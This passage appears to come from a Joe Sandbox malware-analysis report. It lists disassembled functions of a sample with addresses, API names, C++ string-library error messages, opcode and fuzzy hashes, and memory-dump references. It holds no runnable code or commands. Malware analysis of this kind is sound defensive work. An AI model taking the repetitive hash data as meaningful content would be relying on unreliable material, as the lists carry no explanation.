                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentThread$__stdio_common_vfprintf
                              • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                              • API String ID: 2945376304-884133013
                              • Opcode ID: a0ff05e707b64d08921eeb25c26af220c9d549fd2218f70cb156f8b0d66aa548
                              • Instruction ID: 175ae40deac8d3b601531dcf3af5b55dfcbd84eed0afdb60e409b128b3f8740c
                              • Opcode Fuzzy Hash: a0ff05e707b64d08921eeb25c26af220c9d549fd2218f70cb156f8b0d66aa548
                              • Instruction Fuzzy Hash: 8C018473A0974595F6A1AB29E800568B7A4FF88BD9B888136EE5C63314DF3CE441EB11
                              Function 00007FF733AABA50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44threadCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
                              • API String ID: 2882836952-1971217749
                              • Opcode ID: 3c4eb564119c554906c01dd9a86d1ab296fac8511914a9794bd7289825be21fe
                              • Instruction ID: 55821b46955c30adcd2b851f572d951374558793818ec9a7b07862d267f71549
                              • Opcode Fuzzy Hash: 3c4eb564119c554906c01dd9a86d1ab296fac8511914a9794bd7289825be21fe
                              • Instruction Fuzzy Hash: 5101C033B0960596FAA1AF19E800729BBA0EB84FE5F949035EE4D63354DB3CD4459B50
                              Function 00007FF733A9DD00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabort
                              • String ID: vector::_M_default_append
                              • API String ID: 747564614-2089250579
                              • Opcode ID: 27f72fc37180552719ab7653c3d92669384b623792be3715fd81ef114992ecbf
                              • Instruction ID: 41cae846773772392dfb0e126083c6035d4b1587f5863182f8384c7377bf9989
                              • Opcode Fuzzy Hash: 27f72fc37180552719ab7653c3d92669384b623792be3715fd81ef114992ecbf
                              • Instruction Fuzzy Hash: 49115B72508A8891E7619F25E4403E9B7B1FB8CBD8F845221EF8E23718DF79D195CB40
                              Function 00007FF733B38A50 Relevance: 6.4, APIs: 5, Instructions: 173COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 9bf8fa895261e6292a8fb937f4f472739ebca12ad77646f0cb67d6c2477a8c2f
                              • Instruction ID: b3a46a2116275834a13dc2c93e13e5ce2c1701fdfa1ba9ef38d05a681423397f
                              • Opcode Fuzzy Hash: 9bf8fa895261e6292a8fb937f4f472739ebca12ad77646f0cb67d6c2477a8c2f
                              • Instruction Fuzzy Hash: D771C1B2604A8295D7A49F2AD44026EF3A1FB04B94F84C132DFADA7B54DF3DE544D322
                              Function 00007FF733A9C6F0 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: freememcpystrlen
                              • String ID:
                              • API String ID: 2208669145-0
                              • Opcode ID: aae3cc160c6798945c287fc8f5fca50fc1fbacd37a45c8ac4be0bc793831e12a
                              • Instruction ID: c84b53bf787af690bf28df96876817e0f33d672eed4e077dc7dc8c4efcaff3eb
                              • Opcode Fuzzy Hash: aae3cc160c6798945c287fc8f5fca50fc1fbacd37a45c8ac4be0bc793831e12a
                              • Instruction Fuzzy Hash: B331C6A2A5DE4661FAF17A116E00B79D1906F937E0F948230FE5D37BD4EF2CE441A220
                              Function 00007FF733AA7C00 Relevance: 6.3, APIs: 5, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
                              • String ID:
                              • API String ID: 3630377130-0
                              • Opcode ID: 1ca9511d0339075ec17bfd488b036e4e96dd455ea84bad3b4d7cecf6d5fa65d3
                              • Instruction ID: 4a11dbaade8d66a018ce0be40123977e4d338612f6ca0668bb019412044739fb
                              • Opcode Fuzzy Hash: 1ca9511d0339075ec17bfd488b036e4e96dd455ea84bad3b4d7cecf6d5fa65d3
                              • Instruction Fuzzy Hash: 6231C433A04642AAE7B0AF32D440A6AA360EF40F59F844131EE2D973A4EF3DE445D760
                              Function 00007FF733AA8ED0 Relevance: 6.3, APIs: 5, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 98228a98520ab0d79af3989dbb66abeb84b729b3ca6878a32138a707fc21c380
                              • Instruction ID: 3e249508c6571da9a53ebc8d2b0a6d0def05c27fd12ae25d46604db6aa4c44fc
                              • Opcode Fuzzy Hash: 98228a98520ab0d79af3989dbb66abeb84b729b3ca6878a32138a707fc21c380
                              • Instruction Fuzzy Hash: D331A523A09A83A5FAF4EF159500B79A796AF40BC1FC40139E92D73690DF3CA441B3A1
                              Function 00007FF733AA1370 Relevance: 6.2, APIs: 4, Instructions: 238COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 20a7e25ae2f5b8328674a0f4ac714b52c702c64851b07f52b4c4924b47296424
                              • Instruction ID: 10de26c21c46d99bc3e72a3613d2707ed7ca12f1ba876634684b04d3023185be
                              • Opcode Fuzzy Hash: 20a7e25ae2f5b8328674a0f4ac714b52c702c64851b07f52b4c4924b47296424
                              • Instruction Fuzzy Hash: DC91B777E08656A6E7B59F298100B39A7D1EB14BD8F948131EE2D673C4DA3CE80197A0
                              Function 00007FF733B0B290 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 166COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                              • API String ID: 0-1533248280
                              • Opcode ID: 965b41443005a4bd11c02f365632c9bc7a19c608c1cb2a4de366f72592f625fd
                              • Instruction ID: bab70679db53caf3cd16612739865255a6d28d48bf585dcd3c939fe383b459c5
                              • Opcode Fuzzy Hash: 965b41443005a4bd11c02f365632c9bc7a19c608c1cb2a4de366f72592f625fd
                              • Instruction Fuzzy Hash: C6413FA2F05645A1FF60BB61E4146BCA3519F65BC8F844031DE8C1F395DF2CD591D362
                              Function 00007FF733B0B8D0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 166COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                              • API String ID: 0-1533248280
                              • Opcode ID: af2dcb9da00b2127917a29dd6554adda78f47c7150c083ba271ac8251a188fb5
                              • Instruction ID: f69f7526edafc12f7b2b17a97caa44f04836cbd4105849b82e0acaed24d81969
                              • Opcode Fuzzy Hash: af2dcb9da00b2127917a29dd6554adda78f47c7150c083ba271ac8251a188fb5
                              • Instruction Fuzzy Hash: 40414CA2F06A45A1FE60BB61D4446BCA3609F65B88F844032DE8C2F396DF2CD591D362
                              Function 00007FF733AC04E0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 152stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlenwcslen
                              • String ID: basic_string: construction from null is not valid
                              • API String ID: 803329031-2991274800
                              • Opcode ID: a694fc38edc40f1e1a3ddc1351a9a388258d32940574fce78bc966d0aa4bac82
                              • Instruction ID: 46958d69fe13c729cb611eea201c42613925bcf518fc97f915a1d7d1dc018138
                              • Opcode Fuzzy Hash: a694fc38edc40f1e1a3ddc1351a9a388258d32940574fce78bc966d0aa4bac82
                              • Instruction Fuzzy Hash: DA41EB52B49B19A1EEA5FF16E8400EC6360FB84F94BC90432DD4D67761DE3CE982E310
                              Function 00007FF733B01040 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF733AFFF10), ref: 00007FF733B010B2
                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF733AFFF10), ref: 00007FF733B010EB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: basic_string::assign
                              • API String ID: 3510742995-2385367300
                              • Opcode ID: 6c7b10b8e5a2c53e6fe3b9f759899b985a666dc1874d6facf1609b3349958b65
                              • Instruction ID: 1e282c3f04e9b7afe7742da1cd891daf09ba64fd47c96f24c2ec8981468671e6
                              • Opcode Fuzzy Hash: 6c7b10b8e5a2c53e6fe3b9f759899b985a666dc1874d6facf1609b3349958b65
                              • Instruction Fuzzy Hash: 2741C726B0964560EAB8AF1AD5445BCA3519F44FD4FC48131DF9C6B790DF2CD442A353
                              Function 00007FF733B0A550 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                              • API String ID: 2221118986-1339558951
                              • Opcode ID: 43cffd217ec33c1bceef69faa729bf84f2b5025ce2f9f2a063dfd4f312506e70
                              • Instruction ID: 3bd4754c518ee21dc7df627d1ef657bb9cc660b4d9549ae10d362e551a19474e
                              • Opcode Fuzzy Hash: 43cffd217ec33c1bceef69faa729bf84f2b5025ce2f9f2a063dfd4f312506e70
                              • Instruction Fuzzy Hash: DA312862B09A45A0FA64AB56D840CBDA321AB45BD0FC44932DF9C2B381DF3CE5849352
                              Function 00007FF733B33B10 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: basic_ios::clear$basic_string::_M_replace
                              • API String ID: 3510742995-1781676995
                              • Opcode ID: e7103facf6c6cb710926b8d717fcb9550371a2b1a81520135f7663cf99c2b02b
                              • Instruction ID: 4f556aedf8a6672d6ea4e17cdb096ea780e616d61d4f48155786df1334ef4e07
                              • Opcode Fuzzy Hash: e7103facf6c6cb710926b8d717fcb9550371a2b1a81520135f7663cf99c2b02b
                              • Instruction Fuzzy Hash: 7E310821B0C7B561EA70AB259400279A650AB01BF0FDC4231DEAD27FC5DE3DE441A331
                              Function 00007FF733AD4030 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: wcrtomb$___mb_cur_max_funcmemcpy
                              • String ID:
                              • API String ID: 4290179537-0
                              • Opcode ID: 5cd2f862e0fcea17289983a9e587c8ac96bf3522af7269f8e57693846bf11fc0
                              • Instruction ID: 006021ba2f2a77a4bd7d9ab399cb77ada5491d2291879984b6f38db65e5d50b5
                              • Opcode Fuzzy Hash: 5cd2f862e0fcea17289983a9e587c8ac96bf3522af7269f8e57693846bf11fc0
                              • Instruction Fuzzy Hash: 7E31F963B08A5660DE706B16B8146A9E754AB25BF4F848631FD6C277D8DE3CD4C1E310
                              Function 00007FF733AC0080 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlen
                              • String ID: basic_string: construction from null is not valid
                              • API String ID: 39653677-2991274800
                              • Opcode ID: 5705245799f25b4146dd0d8d34c8cbcf5bdb1a141f42ec2552b59f1f85de4a9c
                              • Instruction ID: b9ee97e17a0c92bb2efe25ac3031243f46e5f217a8be948fc610da7c1009ae3f
                              • Opcode Fuzzy Hash: 5705245799f25b4146dd0d8d34c8cbcf5bdb1a141f42ec2552b59f1f85de4a9c
                              • Instruction Fuzzy Hash: 4421DB62B49B1561EDA9BB1AE8500E8A350FF44F94FC80432DE5C2B361DE2DD887D361
                              Function 00007FF733B0A020 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF733ABAA8E), ref: 00007FF733B0A091
                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF733ABAA8E), ref: 00007FF733B0A0C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: basic_string::assign
                              • API String ID: 3510742995-2385367300
                              • Opcode ID: 5a26191a9a50b075db456e764b83f220906e009dc922310ed1598a2b9afdc25f
